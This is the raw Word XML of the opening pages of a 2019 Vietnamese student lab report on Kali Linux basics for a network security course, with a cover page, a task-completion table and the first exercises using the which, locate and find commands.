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A0EB6" w14:textId="55582B9F" w:rsidR="0073615B" w:rsidRPr="000055C2" w:rsidRDefault="000055C2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Algerian" w:hAnsi="Algerian"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000055C2">
        <w:rPr>
          <w:rFonts w:ascii="Algerian" w:hAnsi="Algerian"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>LAB 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328E45C9" w14:textId="73B6CEAA" w:rsidR="000055C2" w:rsidRPr="000055C2" w:rsidRDefault="000055C2" w:rsidP="000055C2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52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000055C2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>TỔNG QUAN KALI LINUX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2FD404" w14:textId="77777777" w:rsidR="000055C2" w:rsidRDefault="000055C2" w:rsidP="000055C2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8E57438" w14:textId="77777777" w:rsidR="000055C2" w:rsidRPr="009613E4" w:rsidRDefault="000055C2" w:rsidP="000055C2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>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>An</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> toàn mạng máy tính</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A86F38" w14:textId="77777777" w:rsidR="000055C2" w:rsidRDefault="000055C2" w:rsidP="000055C2">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B16956">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kỳ báo cáo: Buổi 01 (Session 01)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BFA03E" w14:textId="77777777" w:rsidR="000055C2" w:rsidRPr="009613E4" w:rsidRDefault="000055C2" w:rsidP="000055C2">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Tên chủ đề: Dò</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> quét và bắt gói tin trong mạng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27734FC1" w14:textId="77777777" w:rsidR="000055C2" w:rsidRPr="009613E4" w:rsidRDefault="000055C2" w:rsidP="000055C2">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295F41">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">GVHD: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Nghi Hoàng Khoa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC761CE" w14:textId="77777777" w:rsidR="000055C2" w:rsidRPr="00FF12B3" w:rsidRDefault="000055C2" w:rsidP="000055C2">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF12B3">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Ngày báo cáo: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>05</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF12B3">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF12B3">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>/2019</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FFC246" w14:textId="77777777" w:rsidR="000055C2" w:rsidRPr="00787643" w:rsidRDefault="000055C2" w:rsidP="000055C2">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00787643">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Nhóm: 01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> (ghi số thứ tự nhóm)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB12339" w14:textId="77777777" w:rsidR="000055C2" w:rsidRDefault="000055C2" w:rsidP="000055C2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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42A13253" w14:textId="77777777" w:rsidR="000055C2" w:rsidRDefault="000055C2" w:rsidP="000055C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3D147437" w14:textId="65531E20" w:rsidR="000055C2" w:rsidRPr="009613E4" w:rsidRDefault="000055C2" w:rsidP="000055C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Pr="009613E4">
        <w:t>NT101.</w:t>
      </w:r>
      <w:r>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="009613E4">
        <w:t>11.A</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:t>NTN.1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2"/>
        <w:gridCol w:w="3292"/>
        <w:gridCol w:w="2431"/>
        <w:gridCol w:w="3298"/>
      </w:tblGrid>
      <w:tr w:rsidR="000055C2" w:rsidRPr="008D0072" w14:paraId="1C50A7E0" w14:textId="77777777" w:rsidTr="00527DF3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54BB488E" w14:textId="77777777" w:rsidR="000055C2" w:rsidRPr="008D0072" w:rsidRDefault="000055C2" w:rsidP="00527DF3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FDB62FA" w14:textId="77777777" w:rsidR="000055C2" w:rsidRPr="008D0072" w:rsidRDefault="000055C2" w:rsidP="00527DF3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0E70E02C" w14:textId="77777777" w:rsidR="000055C2" w:rsidRPr="008D0072" w:rsidRDefault="000055C2" w:rsidP="00527DF3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1B54B92D" w14:textId="77777777" w:rsidR="000055C2" w:rsidRPr="008D0072" w:rsidRDefault="000055C2" w:rsidP="00527DF3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0055C2" w14:paraId="3A8B031C" w14:textId="77777777" w:rsidTr="00527DF3">
        <w:trPr>
          <w:trHeight w:val="282"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="772" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D44FC83" w14:textId="77777777" w:rsidR="000055C2" w:rsidRDefault="000055C2" w:rsidP="00527DF3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3A981A03" w14:textId="77777777" w:rsidR="000055C2" w:rsidRDefault="000055C2" w:rsidP="00527DF3">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:ind w:left="156"/>
            </w:pPr>
            <w:r>
              <w:t>Trần Hoàng Khang</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2431" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="782AB88F" w14:textId="77777777" w:rsidR="000055C2" w:rsidRDefault="000055C2" w:rsidP="00527DF3">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:ind w:left="156"/>
            </w:pPr>
            <w:r>
              <w:t>19521671</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3298" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19F72D21" w14:textId="77777777" w:rsidR="000055C2" w:rsidRDefault="000055C2" w:rsidP="00527DF3">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>19521671@gm.uit.edu.vn</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000055C2" w14:paraId="5B0199AB" w14:textId="77777777" w:rsidTr="00527DF3">
        <w:trPr>
          <w:trHeight w:val="416"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="772" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="020324E3" w14:textId="77777777" w:rsidR="000055C2" w:rsidRDefault="000055C2" w:rsidP="00527DF3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4DAAD887" w14:textId="77777777" w:rsidR="000055C2" w:rsidRDefault="000055C2" w:rsidP="00527DF3">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:ind w:left="156"/>
            </w:pPr>
            <w:r>
              <w:t>Nguyễn Đoàn Xuân Bình</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2431" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E419880" w14:textId="77777777" w:rsidR="000055C2" w:rsidRDefault="000055C2" w:rsidP="00527DF3">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:ind w:left="156"/>
            </w:pPr>
            <w:r>
              <w:t>19521265</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3298" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25842EBC" w14:textId="77777777" w:rsidR="000055C2" w:rsidRDefault="000055C2" w:rsidP="00527DF3">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>19521265@gm.uit.edu.vn</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4723458C" w14:textId="77843FF1" w:rsidR="000055C2" w:rsidRDefault="000055C2" w:rsidP="000055C2">
      <w:pP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65A5068E" w14:textId="3458C9C7" w:rsidR="000055C2" w:rsidRPr="000055C2" w:rsidRDefault="000055C2" w:rsidP="000055C2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000055C2">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>NỘI DUNG THỰC HIỆN:</w:t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6124"/>
        <w:gridCol w:w="2880"/>
      </w:tblGrid>
      <w:tr w:rsidR="000055C2" w:rsidRPr="008D0072" w14:paraId="12EF8B8E" w14:textId="77777777" w:rsidTr="00527DF3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6F96B14" w14:textId="77777777" w:rsidR="000055C2" w:rsidRPr="008D0072" w:rsidRDefault="000055C2" w:rsidP="00527DF3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6124" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="AEAAAA" w:themeFill="background2" w:themeFillShade="BF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="298D8A8D" w14:textId="77777777" w:rsidR="000055C2" w:rsidRPr="008D0072" w:rsidRDefault="000055C2" w:rsidP="00527DF3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880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="AEAAAA" w:themeFill="background2" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="3609041D" w14:textId="77777777" w:rsidR="000055C2" w:rsidRPr="008D0072" w:rsidRDefault="000055C2" w:rsidP="00527DF3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</w:tr>
      <w:tr w:rsidR="000055C2" w14:paraId="38FE951F" w14:textId="77777777" w:rsidTr="00527DF3">
        <w:trPr>
          <w:trHeight w:val="56"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="768" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0AC970D9" w14:textId="77777777" w:rsidR="000055C2" w:rsidRDefault="000055C2" w:rsidP="00527DF3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6124" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6CFAF964" w14:textId="77777777" w:rsidR="000055C2" w:rsidRDefault="000055C2" w:rsidP="00527DF3">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Kịch bản 01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="733E52E2" w14:textId="77777777" w:rsidR="000055C2" w:rsidRDefault="000055C2" w:rsidP="00527DF3">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t>100%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000055C2" w14:paraId="01280A1F" w14:textId="77777777" w:rsidTr="00527DF3">
        <w:trPr>
          <w:trHeight w:val="56"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="768" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="19ABAB31" w14:textId="77777777" w:rsidR="000055C2" w:rsidRDefault="000055C2" w:rsidP="00527DF3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6124" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="69D343FA" w14:textId="77777777" w:rsidR="000055C2" w:rsidRPr="00B00619" w:rsidRDefault="000055C2" w:rsidP="00527DF3">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Kịch bản 02 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68E3AB1B" w14:textId="77777777" w:rsidR="000055C2" w:rsidRPr="004067CC" w:rsidRDefault="000055C2" w:rsidP="00527DF3">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t>100%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000055C2" w14:paraId="0936FA52" w14:textId="77777777" w:rsidTr="00527DF3">
        <w:trPr>
          <w:trHeight w:val="56"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="768" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7818FC88" w14:textId="77777777" w:rsidR="000055C2" w:rsidRDefault="000055C2" w:rsidP="00527DF3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6124" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="719CF33A" w14:textId="77777777" w:rsidR="000055C2" w:rsidRDefault="000055C2" w:rsidP="00527DF3">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Kịch bản 03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D2BED2F" w14:textId="77777777" w:rsidR="000055C2" w:rsidRDefault="000055C2" w:rsidP="00527DF3">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t>100%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000055C2" w14:paraId="2A7A5F07" w14:textId="77777777" w:rsidTr="00527DF3">
        <w:trPr>
          <w:trHeight w:val="56"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="768" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1D2DD1E4" w14:textId="77777777" w:rsidR="000055C2" w:rsidRDefault="000055C2" w:rsidP="00527DF3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6124" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="01D9D0DA" w14:textId="77777777" w:rsidR="000055C2" w:rsidRDefault="000055C2" w:rsidP="00527DF3">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Kịch bản 04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C2DF771" w14:textId="77777777" w:rsidR="000055C2" w:rsidRDefault="000055C2" w:rsidP="00527DF3">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t>90%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000055C2" w14:paraId="1F50FC8B" w14:textId="77777777" w:rsidTr="00527DF3">
        <w:trPr>
          <w:trHeight w:val="56"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="768" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="339C6A22" w14:textId="77777777" w:rsidR="000055C2" w:rsidRDefault="000055C2" w:rsidP="00527DF3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6124" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="12A064FC" w14:textId="77777777" w:rsidR="000055C2" w:rsidRDefault="000055C2" w:rsidP="00527DF3">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Kịch bản 05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E4EC7BA" w14:textId="77777777" w:rsidR="000055C2" w:rsidRDefault="000055C2" w:rsidP="00527DF3">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t>60%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="00F52F66" w14:textId="77777777" w:rsidR="000055C2" w:rsidRDefault="000055C2" w:rsidP="000055C2">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2360B5" w14:textId="77777777" w:rsidR="000055C2" w:rsidRDefault="000055C2" w:rsidP="000055C2">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:before="360"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52307DB7" w14:textId="77777777" w:rsidR="000055C2" w:rsidRDefault="000055C2" w:rsidP="000055C2">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:before="360"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="786D396B" w14:textId="16B25340" w:rsidR="000055C2" w:rsidRPr="000055C2" w:rsidRDefault="000055C2" w:rsidP="000055C2">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:before="360"/>
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00926DAB">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>BÁO CÁO CHI TIẾT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2795E615" w14:textId="50EBC839" w:rsidR="000055C2" w:rsidRDefault="000055C2" w:rsidP="007E0474">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="fontstyle21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A11D4C">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
        </w:rPr>
        <w:t xml:space="preserve">Sử dụng lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00A11D4C">
        <w:rPr>
          <w:rStyle w:val="fontstyle21"/>
        </w:rPr>
        <w:t xml:space="preserve">which </w:t>
      </w:r>
      <w:r w:rsidRPr="00A11D4C">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
        </w:rPr>
        <w:t xml:space="preserve">để xác định ví trị lưu trữ của lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00A11D4C">
        <w:rPr>
          <w:rStyle w:val="fontstyle21"/>
        </w:rPr>
        <w:t>pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006D0608" w14:textId="77777777" w:rsidR="00A11D4C" w:rsidRPr="00A11D4C" w:rsidRDefault="00A11D4C" w:rsidP="007E0474">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="fontstyle21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CE2C09D" w14:textId="718D13C8" w:rsidR="000055C2" w:rsidRDefault="0009087F" w:rsidP="000055C2">
      <w:pPr>
        <w:ind w:left="360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  <w:r w:rsidRPr="00A11D4C">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37449D58" wp14:editId="5E551940">
            <wp:extent cx="2448267" cy="819264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C64F" w14:textId="77777777" w:rsidR="00A11D4C" w:rsidRPr="00A11D4C" w:rsidRDefault="00A11D4C" w:rsidP="000055C2">
      <w:pPr>
        <w:ind w:left="360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</w:p>
    <w:p w14:paraId="099C586C" w14:textId="5290A43B" w:rsidR="000055C2" w:rsidRDefault="000055C2" w:rsidP="007E0474">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="fontstyle21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A11D4C">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
        </w:rPr>
        <w:t xml:space="preserve">Sử dụng lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00A11D4C">
        <w:rPr>
          <w:rStyle w:val="fontstyle21"/>
        </w:rPr>
        <w:t xml:space="preserve">locate </w:t>
      </w:r>
      <w:r w:rsidRPr="00A11D4C">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
        </w:rPr>
        <w:t xml:space="preserve">để xác định ví trí lưu trữ </w:t>
      </w:r>
      <w:r w:rsidRPr="00A11D4C">
        <w:rPr>
          <w:rStyle w:val="fontstyle21"/>
        </w:rPr>
        <w:t>wce32.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F95BFB" w14:textId="77777777" w:rsidR="00A11D4C" w:rsidRPr="00A11D4C" w:rsidRDefault="00A11D4C" w:rsidP="00A11D4C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rStyle w:val="fontstyle21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="641720C6" w14:textId="264A58EB" w:rsidR="000055C2" w:rsidRDefault="000055C2" w:rsidP="000055C2">
      <w:pPr>
        <w:ind w:left="360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  <w:r w:rsidRPr="00A11D4C">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6483AE92" wp14:editId="2ACD0051">
            <wp:extent cx="3410426" cy="6477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3B6" w14:textId="77777777" w:rsidR="00A11D4C" w:rsidRPr="00A11D4C" w:rsidRDefault="00A11D4C" w:rsidP="000055C2">
      <w:pPr>
        <w:ind w:left="360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</w:p>
    <w:p w14:paraId="57A7E343" w14:textId="362F3368" w:rsidR="000055C2" w:rsidRDefault="0009087F" w:rsidP="007E0474">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A11D4C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Sử dụng lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00A11D4C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-BoldItalic" w:hAnsi="Cambria-BoldItalic"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">find </w:t>
      </w:r>
      <w:r w:rsidRPr="00A11D4C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>để xác định bất kỳ tập tin (không phải thư mục) đã được sửa</w:t>
      </w:r>
      <w:r w:rsidRPr="00A11D4C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">đổi vào ngày trước đó, KHÔNG thuộc sở hữu của user root và thực thi lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00A11D4C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-BoldItalic" w:hAnsi="Cambria-BoldItalic"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ls -l</w:t>
      </w:r>
      <w:r w:rsidRPr="00A11D4C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-BoldItalic" w:hAnsi="Cambria-BoldItalic"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00A11D4C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>trên chúng. KHÔNG được sử dụng các lệnh pipeline/chaining</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD3EFA7" w14:textId="77777777" w:rsidR="00A11D4C" w:rsidRPr="00A11D4C" w:rsidRDefault="00A11D4C" w:rsidP="00A11D4C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DCFB51B" w14:textId="77777777" w:rsidR="00BE762F" w:rsidRPr="00A11D4C" w:rsidRDefault="00BE762F" w:rsidP="00BE762F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
